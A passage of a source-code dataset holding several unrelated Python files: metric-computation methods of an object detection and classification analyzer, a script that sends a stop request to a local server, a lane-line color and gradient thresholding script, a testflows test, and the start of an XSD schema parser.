If None perform the analysis for all the properties.\n (default is None)\n \"\"\"\n if properties is None:\n properties = self.dataset.get_property_keys()\n elif not self._are_valid_properties(properties):\n return\n for property in properties:\n self.show_distribution_of_property(property)\n\n\n def analyze_sensitivity_impact_of_properties(self, properties=None, metric=None):\n \"\"\"Analyzes the sensitivity and the impact of the properties specified in the parameters.\n\n Parameters\n ----------\n properties: list of str, optional\n Names of the properties to consider in the analysis. If None consider all the properties. (default is None)\n metric: str\n Metric used for the analysis. If None use the default metrics. (default is None)\n \"\"\"\n if properties is None:\n properties = self.dataset.get_property_keys()\n else:\n if not self._are_valid_properties(properties):\n return\n display_names = [self.dataset.get_display_name_of_property(pkey) for pkey in properties]\n\n if metric is None:\n metric = self.metric\n elif not self._is_valid_metric(metric):\n return\n\n for pkey in properties:\n values = self.dataset.get_values_for_property(pkey)\n self.analyze_property(pkey, values, show=False, metric=metric)\n\n display_sensitivity_impact_plot(self.saved_results[metric], self.result_saving_path, properties,\n display_names, metric, self.__SAVE_PNG_GRAPHS)\n\n def get_tp_distribution(self, categories=None):\n if self.__is_binary:\n logger.error(\"Not supported for binary classification\")\n return\n if categories is None:\n categories = self.dataset.get_categories_names()\n elif not self._are_valid_categories(categories):\n return\n\n if categories is not None:\n tp_classes = self._analyze_true_positive_for_categories(categories)\n plot_class_distribution(tp_classes, self.result_saving_path, self.__SAVE_PNG_GRAPHS, \"True Positive\")\n\n def get_fn_distribution(self, categories=None):\n if self.__is_binary:\n logger.error(\"Not supported for binary classification\")\n return\n if categories is None:\n categories = self.dataset.get_categories_names()\n elif not self._are_valid_categories(categories):\n return\n\n if categories is not None:\n tp_classes = self._analyze_false_negative_for_categories(categories)\n plot_class_distribution(tp_classes, self.result_saving_path, self.__SAVE_PNG_GRAPHS, \"False Negative\")\n\n @abc.abstractmethod\n def _analyze_true_positive_for_categories(self, categories):\n pass\n\n @abc.abstractmethod\n def _analyze_false_negative_for_categories(self, categories):\n pass\n\n def get_fp_error_distribution(self, categories=None):\n if self.__is_binary:\n logger.error(\"Not supported for binary classification\")\n return\n if categories is None:\n categories = self.dataset.get_categories_names()\n elif not self._are_valid_categories(categories):\n return\n self.fp_errors = None\n error_dict_total = self._analyze_false_positive_errors(categories)\n plot_class_distribution(error_dict_total[\"distribution\"], self.result_saving_path, self.__SAVE_PNG_GRAPHS,\n \"False Positive\")\n\n def analyze_false_positive_errors(self, categories=None, metric=None):\n if self.__is_binary:\n logger.error(\"Not supported for binary classification\")\n return\n if categories is None:\n categories = self.dataset.get_categories_names()\n elif not self._are_valid_categories(categories):\n return\n if metric is None:\n metric = self.metric\n elif not self._is_valid_metric(metric):\n return\n if not self.__is_binary:\n self.get_fp_error_distribution(categories)\n for category in 
categories:\n self.analyze_false_positive_error_for_category(category, categories=categories, metric=metric)\n\n def analyze_curve_for_categories(self, categories=None, curve='precision_recall_curve'):\n if self.__is_binary:\n categories = [self.dataset.get_categories_names()[0]]\n else:\n if categories is None:\n categories = self.dataset.get_categories_names()\n elif not self._are_valid_categories(categories):\n return\n if not self.__is_valid_curve(curve):\n return\n results = self._compute_curve_for_categories(categories, curve)\n plot_categories_curve(results, curve, self.__SAVE_PNG_GRAPHS, self.result_saving_path)\n\n def set_normalization(self, use_normalization, with_properties=True, norm_factor_categories=None,\n norm_factors_properties=None):\n \"\"\"Sets the normalization for the metrics calculation\n\n Parameters\n ----------\n use_normalization: bool\n Specifies whether or not to use normalization\n with_properties: bool\n Specifies whether or not to normalize also on properties values\n norm_factor_categories: float, optional\n Categories normalization factor (default is 1/number of categories)\n norm_factors_properties: list of pairs, optional\n Properties normalization factors.\n\n Each pair specifies the normalization factor to apply to a specific property.\n (Example: [(name1, value1), (name2, value2), ...]\n \"\"\"\n self._use_normalization = use_normalization\n if with_properties:\n self.use_new_normalization = True\n else:\n self.use_new_normalization = False\n if norm_factor_categories is not None:\n self._norm_factors[\"categories\"] = norm_factor_categories\n if norm_factors_properties is not None:\n dataset_p_names = self.dataset.get_property_keys()\n for p_name, p_value in norm_factors_properties:\n if p_name in dataset_p_names:\n self._norm_factors[p_name] = p_value\n else:\n logger.warn(\"Invalid property name in 'norm_factors_properties'.\")\n self.clear_saved_results()\n self.fp_errors = None\n\n def set_confidence_threshold(self, threshold):\n \"\"\"Sets the threshold value. Predictions with a confidence lower than the threshold are ignored.\n\n Parameters\n ----------\n threshold: float\n Threshold value. Must be between 0 and 1\n \"\"\"\n if threshold < 0 or threshold > 1:\n logger.error(\"Invalid threshold value.\")\n return\n self.conf_thresh = threshold\n self.clear_saved_results()\n self.fp_errors = None\n\n def clear_saved_results(self, metrics=None):\n if metrics is None:\n self.saved_results = {}\n else:\n for m in metrics:\n if m in self.saved_results.keys():\n self.saved_results[m] = {}\n else:\n if self._is_valid_metric(m):\n logger.warn(f\"No data for metric {m}\")\n\n def _get_report_results(self, default_metrics, metrics, categories, properties, show_categories, show_properties):\n if metrics is None:\n metrics = default_metrics\n else:\n for m in metrics:\n if m not in default_metrics and m != 'custom':\n logger.error(\n \"Metric {} not supported for report. 
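# --- Editor's note: standalone illustrative sketch; not part of the dataset record around it. ---
# _get_report_results (this method) goes on to merge the per-metric results
# with a row-type column and index the report by (type, label). The same
# reshaping in miniature, with made-up numbers:
import pandas as pd

results = {"precision": {"avg macro": 0.8, "cat": 0.9}}
types = {"type": {"avg macro": "Total", "cat": "Category"}}
report = pd.merge(pd.DataFrame(results), pd.DataFrame(types),
                  left_index=True, right_index=True).reset_index()
report = report.rename(columns={"index": "label"}).set_index(["type", "label"])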
Available metrics: {}.\".format(m, default_metrics))\n return\n\n if self.__is_binary:\n show_categories = False\n else:\n if categories is None:\n categories = self.dataset.get_categories_names()\n elif not categories:\n logger.warn(\"Empty categories list\")\n show_categories = False\n else:\n if not self._are_valid_categories(categories):\n return\n\n if properties is None:\n properties = self.dataset.get_property_keys()\n elif not properties:\n logger.warn(\"Empty properties list\")\n show_properties = False\n else:\n if not self._are_valid_properties(properties):\n return\n\n input_report = self._get_input_report(properties, show_properties)\n results = {}\n types = {}\n if self.__is_binary:\n types = {\"total\": \"Total\"}\n else:\n types[\"avg macro\"] = \"Total\"\n types[\"avg micro\"] = \"Total\"\n if show_categories:\n for cat in categories:\n types[cat] = \"Category\"\n if show_properties:\n for prop in properties:\n p_values = self.dataset.get_values_for_property(prop)\n for p_value in p_values:\n p_value = prop + \"_\" + \"{}\".format(p_value)\n types[p_value] = \"Property\"\n\n type_dict = {\"type\": types}\n\n for metric in metrics:\n results[metric] = self._calculate_report_for_metric(input_report, categories, properties, show_categories,\n show_properties, metric)\n\n type_dataframe = pd.DataFrame(type_dict)\n\n data = pd.DataFrame(results)\n data = pd.merge(data, type_dataframe, left_index=True, right_index=True).reset_index()\n data = data.rename(columns={\"index\": \"label\"})\n data = data.set_index([\"type\", \"label\"])\n return data\n\n def _is_valid_metric(self, metric):\n if metric in self.__valid_metrics:\n return True\n logger.error(f\"Metric '{metric}' not valid. Valid metrics: {self.__valid_metrics}\")\n return False\n\n def _support_precision_score(self, tp, tp_norm, fp):\n np.warnings.filterwarnings('ignore')\n try:\n precision = tp / (tp + fp)\n precision_norm = tp_norm / (tp_norm + fp)\n except ZeroDivisionError:\n precision = 0\n precision_norm = 0\n\n if np.isnan(precision):\n precision = 0\n precision_norm = 0\n return precision, precision_norm\n\n def _support_recall_score(self, tp, tp_norm, fn):\n np.warnings.filterwarnings('ignore')\n try:\n recall = tp / (tp + fn)\n recall_norm = tp_norm / (tp_norm + fn)\n except ZeroDivisionError:\n recall = 0\n recall_norm = 0\n\n if np.isnan(recall):\n recall = 0\n recall_norm = 0\n return recall, recall_norm\n\n def _support_f1_score(self, tp, tp_norm, fp, fn):\n np.warnings.filterwarnings('ignore')\n precision, precision_norm = self._support_precision_score(tp, tp_norm, fp)\n recall, recall_norm = self._support_recall_score(tp, tp_norm, fn)\n try:\n f1 = 2 * precision * recall / (precision + recall)\n f1_norm = 2 * precision_norm * recall_norm / (precision_norm + recall_norm)\n except ZeroDivisionError:\n f1 = 0\n f1_norm = 0\n if np.isnan(f1):\n f1 = 0\n f1_norm = 0\n return f1, f1_norm\n\n def _support_precision_recall(self, n_anns, n_normalized, confidence, tp, fp):\n tp_norm = np.multiply(tp, n_normalized) / n_anns\n precision = np.true_divide(tp, np.add(tp, fp))\n recall = np.true_divide(tp, n_anns)\n fn = n_anns - tp[-1]\n\n np.warnings.filterwarnings('ignore')\n recall_norm = np.true_divide(tp_norm, tp_norm + fn)\n precision_norm = np.true_divide(tp_norm, np.add(tp_norm, fp))\n\n precision = np.nan_to_num(precision)\n precision_norm = np.nan_to_num(precision_norm)\n recall = np.nan_to_num(recall)\n recall_norm = np.nan_to_num(recall_norm)\n\n # same threshold, same value\n thresholds = 
np.unique(confidence)\n rel_indexes = []\n for t in thresholds:\n indexes = np.where(confidence == t)[0]\n for i in indexes:\n precision[i] = precision[indexes[-1]]\n precision_norm[i] = precision_norm[indexes[-1]]\n recall[i] = recall[indexes[-1]]\n recall_norm[i] = recall_norm[indexes[-1]]\n rel_indexes.append(indexes[0])\n\n return precision, precision_norm, recall, recall_norm, rel_indexes\n\n def _support_precision_recall_auc(self, n_gt, n_tot, n_normalized, confidence, tp, fp, is_classification):\n precision, precision_norm, recall, recall_norm, rel_indexes = self._support_precision_recall(n_tot,\n n_normalized,\n confidence, tp, fp)\n one = np.ones(1)\n zero = np.zeros(1)\n precision = np.concatenate([one, precision[np.sort(rel_indexes)]])\n precision_norm = np.concatenate([one, precision_norm[np.sort(rel_indexes)]])\n recall = np.concatenate([zero, recall[np.sort(rel_indexes)]])\n recall_norm = np.concatenate([zero, recall_norm[np.sort(rel_indexes)]])\n\n recall = np.flip(recall)\n recall_norm = np.flip(recall_norm)\n precision = np.flip(precision)\n precision_norm = np.flip(precision_norm)\n\n if recall[0] != 1:\n p_value = np.zeros(1)\n if is_classification:\n p_value[0] = n_tot / n_gt\n else:\n p_value[0] = 0 # set 0 in od\n recall = np.concatenate([one, recall])\n recall_norm = np.concatenate([one, recall_norm])\n precision = np.concatenate([p_value, precision])\n if is_classification:\n p_value[0] = n_normalized / (n_normalized + (n_gt - n_tot))\n else:\n p_value[0] = 0 # set 0 in od\n precision_norm = np.concatenate([p_value, precision_norm])\n\n indexes = []\n v_r = -1\n v_p = -1\n index_one_recall = -1\n for i in range(0, len(recall)):\n if recall[i] == 1:\n if precision[i] > v_p:\n v_p = precision[i]\n index_one_recall = i\n try:\n if recall[i+1] != 1:\n indexes.append(index_one_recall)\n except IndexError:\n indexes.append(index_one_recall)\n else:\n if recall[i] == v_r:\n if precision[i] == v_p:\n continue\n v_r = recall[i]\n v_p = precision[i]\n indexes.append(i)\n\n recall = recall[indexes]\n precision = precision[indexes]\n recall_norm = recall_norm[indexes]\n precision_norm = precision_norm[indexes]\n return precision, precision_norm, recall, recall_norm\n\n def _support_f1_curve(self, det_ord, precision, precision_norm, recall, recall_norm, rel_indexes):\n f1 = 2 * np.divide(np.multiply(precision, recall), np.add(precision, recall))\n f1_norm = 2 * np.divide(np.multiply(precision_norm, recall_norm), np.add(precision_norm, recall_norm))\n thresholds = det_ord[np.sort(rel_indexes)]\n f1 = f1[np.sort(rel_indexes)]\n f1_norm = f1_norm[np.sort(rel_indexes)]\n\n one = np.ones(1)\n zero = np.zeros(1)\n if thresholds[0] != 1:\n thresholds = np.concatenate([one, thresholds])\n f1 = np.concatenate([zero, f1])\n f1_norm = np.concatenate([zero, f1_norm])\n if thresholds[-1] != 0:\n thresholds = np.concatenate([thresholds, zero])\n tmp_value = np.zeros(1)\n tmp_value[0] = f1[-1]\n f1 = np.concatenate([f1, tmp_value])\n tmp_value[0] = f1_norm[-1]\n f1_norm = np.concatenate([f1_norm, tmp_value])\n\n f1 = np.flip(f1)\n f1_norm = np.flip(f1_norm)\n thresholds = np.flip(thresholds)\n\n f1 = np.nan_to_num(f1)\n f1_norm = np.nan_to_num(f1_norm)\n\n if self._use_normalization:\n return thresholds, f1_norm\n else:\n return thresholds, f1\n\n def _support_average_precision(self, n_gt, n_tot, n_normalized, confidence, tp, fp, is_classification):\n precision, precision_norm, recall, recall_norm = self._support_precision_recall_auc(n_gt, n_tot, n_normalized,\n confidence, tp, fp,\n 
is_classification)\n std_err = np.std(precision) / np.sqrt(len(precision))\n std_err_norm = np.std(precision_norm) / np.sqrt(len(precision_norm))\n\n ap = -np.sum(np.multiply(np.diff(recall), precision[:-1]))\n ap_norm = -np.sum(np.multiply(np.diff(recall_norm), precision_norm[:-1]))\n\n if self._use_normalization:\n return ap_norm, std_err_norm\n else:\n return ap, std_err\n\n def _are_valid_categories(self, categories):\n if len(categories) == 0:\n logger.error(f\"Empty categories list.\")\n return False\n for c in categories:\n if c not in self.dataset.get_categories_names():\n logger.error(f\"Category '{c}' not valid\")\n return False\n return True\n\n def _are_valid_properties(self, properties):\n if len(properties) == 0:\n logger.error(f\"Empty properties list.\")\n return False\n for p in properties:\n if p not in self.dataset.get_property_keys():\n logger.error(f\"Property '{p}' not valid.\")\n return False\n return True\n\n def _is_valid_property(self, property_name, possible_values):\n if property_name in self.dataset.get_property_keys():\n if len(possible_values) == 0:\n logger.error(f\"Empty possible values list\")\n return False\n for value in possible_values:\n if value not in self.dataset.get_values_for_property(property_name):\n logger.error(f\"Property value '{value}' not valid for property '{property_name}'\")\n return False\n else:\n logger.error(f\"Property '{property_name}' not valid\")\n return False\n return True\n\n def __is_valid_curve(self, curve):\n if curve not in self.__valid_curves:\n logger.error(f\"Curve '{curve}' not valid\")\n return False\n return True\n\n def __create_norm_factors_dict(self, norm_factor_classes, norm_factors_properties):\n norm_factors = {}\n if norm_factor_classes is None:\n norm_factors[\"categories\"] = 1 / len(self.dataset.get_categories_names())\n else:\n norm_factors[\"categories\"] = norm_factor_classes\n if norm_factors_properties is None:\n for p_name in self.dataset.get_property_keys():\n norm_factors[p_name] = 1 / len(self.dataset.get_values_for_property(p_name))\n else:\n p_names = np.array(norm_factors_properties)[:, 0]\n dataset_p_names = self.dataset.get_property_keys()\n remaining_p_names = dataset_p_names - p_names\n for p_name, p_value in norm_factors_properties:\n if p_name in dataset_p_names:\n norm_factors[p_name] = p_value\n else:\n logger.warn(\"Invalid property name in 'norm_factors_properties'.\")\n for p_name in remaining_p_names:\n norm_factors[p_name] = 1 / len(self.dataset.get_values_for_property(p_name))\n return norm_factors\n\n @abc.abstractmethod\n def analyze_false_positive_error_for_category(self, category, categories, metric=None):\n pass\n\n @abc.abstractmethod\n def show_distribution_of_property(self, property_name):\n pass\n\n @abc.abstractmethod\n def analyze_reliability(self, categories=None, num_bins=10):\n pass\n\n @abc.abstractmethod\n def _compute_curve_for_categories(self, categories, curve):\n pass\n\n @abc.abstractmethod\n def _get_normalized_number_of_images(self):\n pass\n\n @abc.abstractmethod\n def _set_normalized_number_of_images_for_categories(self):\n \"\"\"Normalizes the number of images based on the normalization factor of the categories\"\"\"\n pass\n\n @abc.abstractmethod\n def _set_normalized_number_of_images_for_property_for_categories(self, property_name):\n \"\"\"Normalizes the number of images based on the normalization factor of the specified property and the\n normalization factor of the categories\n\n Parameters\n ----------\n property_name: string\n Property name to 
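# --- Editor's note: standalone illustrative sketch; not part of the dataset record around it. ---
# The _support_precision_recall* helpers above work on detections sorted by
# descending confidence, with cumulative TP/FP counts; average precision is a
# rectangle rule over the PR curve. A minimal version without the normalized
# variants and duplicate-confidence handling (function names are mine):
import numpy as np

def precision_recall_from_flags(tp_flags, n_gt):
    # tp_flags: 1/0 per detection, already sorted by descending confidence
    tp = np.cumsum(tp_flags)
    fp = np.cumsum(1 - tp_flags)
    return tp / (tp + fp), tp / n_gt

def average_precision(precision, recall):
    # prepend the (recall=0, precision=1) anchor, then sum rectangles; this is
    # the ascending-recall twin of -sum(diff(recall) * precision[:-1]) above
    precision = np.concatenate([[1.0], precision])
    recall = np.concatenate([[0.0], recall])
    return float(np.sum(np.diff(recall) * precision[1:]))

p, r = precision_recall_from_flags(np.array([1, 1, 0, 1, 0]), n_gt=4)
ap = average_precision(p, r)  # 0.6875 for this toy input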
which the images should be normalized\n \"\"\"\n pass\n\n @abc.abstractmethod\n def _compute_metric(self, gt, detections, matching, metric, is_micro_required=False):\n pass\n\n def _evaluation_metric(self, gt, detections, matching, is_micro_required=False):\n raise NotImplementedError\n\n @abc.abstractmethod\n def _calculate_metric_for_category(self, category, metric):\n pass\n\n @abc.abstractmethod\n def _calculate_metric_for_properties_of_category(self, category_name, category_id, property_name, possible_values,\n matching, metric):\n pass\n\n @abc.abstractmethod\n def _analyze_false_positive_errors(self, categories):\n pass\n\n @abc.abstractmethod\n def _get_input_report(self, properties, show_properties_report):\n pass\n\n @abc.abstractmethod\n def _calculate_report_for_metric(self, input_report, categories, properties, show_categories, show_properties,\n metric):\n pass\n\n @abc.abstractmethod\n def _compute_metric_precision_score(self, gt, detections, matching):\n pass\n\n @abc.abstractmethod\n def _compute_metric_recall_score(self, gt, detections, matching):\n pass\n\n @abc.abstractmethod\n def _compute_metric_f1_score(self, gt, detections, matching):\n pass\n\n @abc.abstractmethod\n def _compute_precision_recall_auc_curve(self, gt, detections, matching):\n pass\n\n @abc.abstractmethod\n def _compute_f1_auc_curve(self, gt, detections, matching):\n pass\n\n @abc.abstractmethod\n def _calculate_reliability(self, y_true, y_pred, y_score, num_bins):\n pass\n\n @abc.abstractmethod\n def _support_metric_threshold(self, n_true_gt, n_normalized, gt_ord, det_ord, tp, fp, threshold):\n pass\n\n @abc.abstractmethod\n def _compute_average_precision_score(self, gt, detections, matching):\n pass\n\n @abc.abstractmethod\n def _support_metric(self, gt, detections, matching):\n pass\n","sub_path":"odin/classes/analyzer_interface.py","file_name":"analyzer_interface.py","file_ext":"py","file_size_in_byte":29844,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"231773545","text":"from argparse import ArgumentParser\nimport requests\nimport ujson as json\n\n\ndef parse_args():\n ap = ArgumentParser()\n ap.add_argument('--server_host', type=str, default='localhost',\n help='Server host.')\n ap.add_argument('--server_port', type=int, default=1337, \n help='Server port.')\n return ap.parse_args()\n\n\ndef run(args):\n url = 'http://%s:%d/stop' % (args.server_host, args.server_port)\n ret = requests.post(url)\n print('Status code: %d' % ret.status_code)\n print('Body: %s' % ret.text)\n\n\nif __name__ == '__main__':\n run(parse_args())\n","sub_path":"py/stop.py","file_name":"stop.py","file_ext":"py","file_size_in_byte":607,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"594655371","text":"#%%\nimport numpy as np\nimport cv2\nimport glob\nimport matplotlib.pyplot as plt\nimport matplotlib.image as mpimg\n\ndef abs_sobel_thresh(img, orient='x', thresh_min=0, thresh_max=255, kernel=3):\n \n # Apply the following steps to img\n # 1) Convert to grayscale\n # 2) Take the derivative in x or y given orient = 'x' or 'y'\n # 3) Take the absolute value of the derivative or gradient\n # 4) Scale to 8-bit (0 - 255) then convert to type = np.uint8\n # 5) Create a mask of 1's where the scaled gradient magnitude \n # is > thresh_min and < thresh_max\n # 6) Return this mask as your binary_output image\n gray = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)\n if orient == 'x':\n abs_sobel = np.absolute(cv2.Sobel(gray, 
cv2.CV_64F, 1, 0, ksize=kernel))\n\n if orient == 'y':\n abs_sobel = np.absolute(cv2.Sobel(gray, cv2.CV_64F, 0, 1, ksize=kernel))\n\n scaled_sobel = np.uint8(255*abs_sobel/np.max(abs_sobel))\n binary_output = np.zeros_like(scaled_sobel)\n binary_output[(scaled_sobel >= thresh_min) & (scaled_sobel <= thresh_max)] = 1\n\n return binary_output\n\ndef mag_threshold(img, sobel_kernel=3, mag_thresh=(0, 255)):\n \n # Apply the following steps to img\n # 1) Convert to grayscale\n gray = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)\n \n # 2) Take the gradient in x and y separately\n sobelX = cv2.Sobel(gray, cv2.CV_64F, 1, 0, ksize=sobel_kernel)\n sobelY = cv2.Sobel(gray, cv2.CV_64F, 0, 1, ksize=sobel_kernel)\n \n # 3) Calculate the magnitude\n gradmag = np.sqrt(sobelX**2 + sobelY**2)\n \n # 4) Scale to 8-bit (0 - 255) and convert to type = np.uint8\n scale_factor = np.max(gradmag)/255\n gradmag = (gradmag/scale_factor).astype(np.uint8)\n\n # 5) Create a binary mask where mag thresholds are met\n binary_output = np.zeros_like(gradmag)\n binary_output[(gradmag >= mag_thresh[0]) & (gradmag <= mag_thresh[1])] = 1\n\n # 6) Return this mask as your binary_output image\n return binary_output\n\ndef dir_threshold(img, sobel_kernel=3, thresh=(0, np.pi/2)):\n \n # Apply the following steps to img\n # 1) Convert to grayscale\n gray = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)\n # 2) Take the gradient in x and y separately\n sobelx = cv2.Sobel(gray, cv2.CV_64F, 1, 0, ksize=sobel_kernel)\n sobely = cv2.Sobel(gray, cv2.CV_64F, 0, 1, ksize=sobel_kernel)\n # 3) Take the absolute value of the x and y gradients\n # 4) Use np.arctan2(abs_sobely, abs_sobelx) to calculate the direction of the gradient \n absgraddir = np.arctan2(np.absolute(sobely), np.absolute(sobelx))\n # 5) Create a binary mask where direction thresholds are met\n binary_output = np.zeros_like(absgraddir)\n binary_output[(absgraddir >= thresh[0]) & (absgraddir <= thresh[1])] = 1\n # 6) Return this mask as your binary_output image\n return binary_output\n\ndef colorBinary(hsv, low, high):\n h = hsv[:,:,0]\n s = hsv[:,:,1]\n v = hsv[:,:,2]\n \n h_binary = np.zeros_like(h)\n h_binary[(h >= low[0]) & (h <= high[0])] = 1\n\n s_binary = np.zeros_like(s)\n s_binary[(s >= low[1]) & (s <= high[1])] = 1\n\n v_binary = np.zeros_like(v)\n v_binary[(v >= low[2]) & (v <= high[2])] = 1\n\n color_binary = np.zeros_like(h)\n color_binary[(h_binary == 1) & (s_binary == 1) & (v_binary == 1)] = 1\n return color_binary\n\ndef processColorGradient(img, s_thresh=(170, 255), h_thresh=(15, 100), sx_thresh=(20, 100), sy_thresh=(40, 100), mag_thresh=(40, 100), dir_thresh=(0, np.pi/2), kernel=3):\n img = np.copy(img)\n \n sxbinary = abs_sobel_thresh(img, orient='x', thresh_min=sx_thresh[0], thresh_max=sx_thresh[1], kernel=kernel)\n sybinary = abs_sobel_thresh(img, orient='y', thresh_min=sy_thresh[0], thresh_max=sy_thresh[1], kernel=kernel)\n mag_binary = mag_threshold(img, sobel_kernel=kernel, mag_thresh=mag_thresh)\n dir_binary = dir_threshold(img, sobel_kernel=kernel, thresh=dir_thresh)\n \n # Convert to HLS color space and separate the V channel\n hls = cv2.cvtColor(img, cv2.COLOR_RGB2HLS)\n h_channel = hls[:,:,0]\n s_channel = hls[:,:,2]\n \n # Threshold color channel\n h_binary = np.zeros_like(h_channel)\n h_binary[(h_channel >= h_thresh[0]) & (h_channel <= h_thresh[1])] = 1\n\n s_binary = np.zeros_like(s_channel)\n s_binary[(s_channel >= s_thresh[0]) & (s_channel <= s_thresh[1])] = 1\n\n # Identify Yellow and White color by HSV\n hsv = cv2.cvtColor(img, cv2.COLOR_RGB2HSV)\n yellow = 
colorBinary(hsv, (5, 100, 100), (75, 255, 255))\n white = colorBinary(hsv, (19, 0, 255-72), (255, 72, 255))\n\n # Stack each channel\n color_binary = np.dstack(( np.zeros_like(sxbinary), s_binary, h_binary, sxbinary, sybinary, mag_binary, dir_binary)) * 255\n yorw = np.zeros_like(sxbinary)\n yorw[(yellow == 1) | (white == 1)] = 1\n \n # Combine the binary thresholds\n combined_binary = np.zeros_like(sxbinary)\n combined_binary[ (yorw == 1) & (((s_binary == 1) & (h_binary == 1)) | ((sxbinary == 1) & (sybinary == 1)) | ((mag_binary == 1) & (dir_binary == 1))) ] = 1\n return color_binary, combined_binary\n\n#%%\nimport re\n# Color Transfrom, Gradient with threshold\n\nimages = glob.glob('../output_images/Undist/test*_undist.jpg')\npattern = re.compile('/output_images/Undist/(.*)_undist.jpg')\n\nfor fname in images:\n image = mpimg.imread(fname)\n result, combined = processColorGradient(image, \n s_thresh=(170, 250), h_thresh=(15, 100), \n sx_thresh=(20, 100), sy_thresh=(0, 255), \n mag_thresh=(30, 100), dir_thresh=(np.pi*30/180, np.pi*75/180), \n kernel=3)\n name = pattern.search(fname).group(1)\n path = '../output_images/' + name + '_color-gradient.jpg' \n # path = '../output_images/test2_color-gradient.jpg' \n mpimg.imsave(path, combined, cmap='gray')","sub_path":"Code/color-gradient.py","file_name":"color-gradient.py","file_ext":"py","file_size_in_byte":5851,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"299712091","text":"#!/usr/bin/python3\nfrom testflows.core import *\nfrom testflows.asserts import error\nfrom testflows._core.objects import Result\n\n\n@TestSuite\ndef my_suite(self):\n with Scenario(\"my inner test\"):\n fail(\"failed\")\n\n\n@TestScenario\ndef my_test(self):\n ok(\"success\")\n\n\n@TestOutline\ndef check_result(self, test, flags=None):\n with Check(\"running the test\"):\n r = Scenario(test=test, flags=Flags(flags))()\n\n with Then(\"the result object should be returned\"):\n assert isinstance(r, Result), error(\"not a result object\")\n\n with And(\"start_time should be set\"):\n assert r.start_time is not None, error(\"start_time should not be None\")\n\n with And(\"test_time should be set\"):\n assert r.test_time is not None, error(\"test_time should not be None\")\n\n\n@TestFeature\ndef feature(self):\n \"\"\"Check returned result objects.\"\"\"\n with Example(\"scenario result object\"):\n check_result(test=my_test)\n\n with Example(\"suite result object\"):\n check_result(test=my_suite, flags=XFAIL)\n\n\nif main():\n feature()\n","sub_path":"tests/results.py","file_name":"results.py","file_ext":"py","file_size_in_byte":1057,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"473463322","text":"import sys\nfrom dataclasses import dataclass\nfrom dataclasses import field\nfrom typing import Any\nfrom typing import List\nfrom typing import Optional\nfrom typing import Tuple\nfrom typing import TypeVar\nfrom urllib.parse import urljoin\n\nfrom lxml.etree import Element\nfrom lxml.etree import QName\n\nfrom xsdata.formats.dataclass.parsers.nodes import XmlNode\nfrom xsdata.formats.dataclass.parsers.xml import XmlParser\nfrom xsdata.models import xsd\nfrom xsdata.models.enums import FormType\nfrom xsdata.models.enums import Mode\nfrom xsdata.models.enums import Namespace\nfrom xsdata.models.mixins import ElementBase\n\nT = TypeVar(\"T\")\nParsedObjects = List[Tuple[QName, Any]]\nXmlNodes = List[XmlNode]\n\n\n@dataclass\nclass SchemaParser(XmlParser):\n 
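# --- Editor's note: standalone illustrative sketch; not part of the dataset records around it. ---
# The color-gradient.py record above builds several binary masks and combines
# them with elementwise AND/OR. The step it repeats is: take a Sobel gradient,
# scale it to 0-255, and keep pixels inside a [min, max] band. A condensed
# version (function name is mine; assumes `img` is a non-constant RGB image):
import cv2
import numpy as np

def sobel_band_mask(img, thresh=(20, 100)):
    gray = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)
    sobel = np.absolute(cv2.Sobel(gray, cv2.CV_64F, 1, 0, ksize=3))
    scaled = np.uint8(255 * sobel / np.max(sobel))  # np.max > 0 assumed
    mask = np.zeros_like(scaled)
    mask[(scaled >= thresh[0]) & (scaled <= thresh[1])] = 1
    return mask
# Masks then combine elementwise, e.g. combined[(m1 == 1) & (m2 == 1)] = 1.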
\"\"\"\n A simple parser to convert an xsd schema to an easy to handle data\n structure based on dataclasses.\n\n The parser is a dummy as possible but it will try to normalize\n certain things like apply parent properties to children.\n\n :param schema_location:\n :param element_form:\n :param attribute_form:\n :param target_namespace:\n :param default_attributes:\n :param default_open_content:\n \"\"\"\n\n location: Optional[str] = field(default=None)\n element_form: Optional[FormType] = field(init=False, default=None)\n attribute_form: Optional[FormType] = field(init=False, default=None)\n target_namespace: Optional[str] = field(default=None)\n default_attributes: Optional[str] = field(default=None)\n default_open_content: Optional[xsd.DefaultOpenContent] = field(default=None)\n\n def dequeue(self, element: Element, queue: XmlNodes, objects: ParsedObjects) -> Any:\n \"\"\"Override parent method to set element index and namespaces map.\"\"\"\n obj: Any = super().dequeue(element, queue, objects)\n\n if isinstance(obj, ElementBase):\n obj.index = element.sourceline\n self.set_namespace_map(element, obj)\n return obj\n\n def start_schema(self, element: Element, item: XmlNode):\n \"\"\"Collect the schema's default form for attributes and elements for\n later usage.\"\"\"\n\n self.element_form = element.attrib.get(\"elementFormDefault\", None)\n self.attribute_form = element.attrib.get(\"attributeFormDefault\", None)\n self.default_attributes = element.attrib.get(\"defaultAttributes\", None)\n\n def set_schema_forms(self, obj: xsd.Schema):\n \"\"\"\n Set the default form type for elements and attributes.\n\n Global elements and attributes are by default qualified.\n \"\"\"\n if self.element_form:\n obj.element_form_default = FormType(self.element_form)\n if self.attribute_form:\n obj.attribute_form_default = FormType(self.attribute_form)\n\n for child_element in obj.elements:\n child_element.form = FormType.QUALIFIED\n\n for child_attribute in obj.attributes:\n child_attribute.form = FormType.QUALIFIED\n\n def set_schema_namespaces(self, obj: xsd.Schema, element: Element):\n \"\"\"Set the given schema's target namespace and add the default\n namespaces if the are missing xsi, xlink, xml, xs.\"\"\"\n obj.target_namespace = obj.target_namespace or self.target_namespace\n\n self.set_namespace_map(element, obj)\n\n @staticmethod\n def set_namespace_map(element: Element, obj: ElementBase):\n \"\"\"Add common namespaces like xml, xsi, xlink if they are missing.\"\"\"\n obj.ns_map = {prefix: uri for prefix, uri in element.nsmap.items() if uri}\n namespaces = obj.ns_map.values()\n for namespace in Namespace:\n if namespace.uri not in namespaces:\n obj.ns_map[namespace.prefix] = namespace.uri\n\n @staticmethod\n def add_default_imports(obj: xsd.Schema):\n \"\"\"Add missing imports to the standard schemas if the namespace is\n declared and.\"\"\"\n imp_namespaces = [imp.namespace for imp 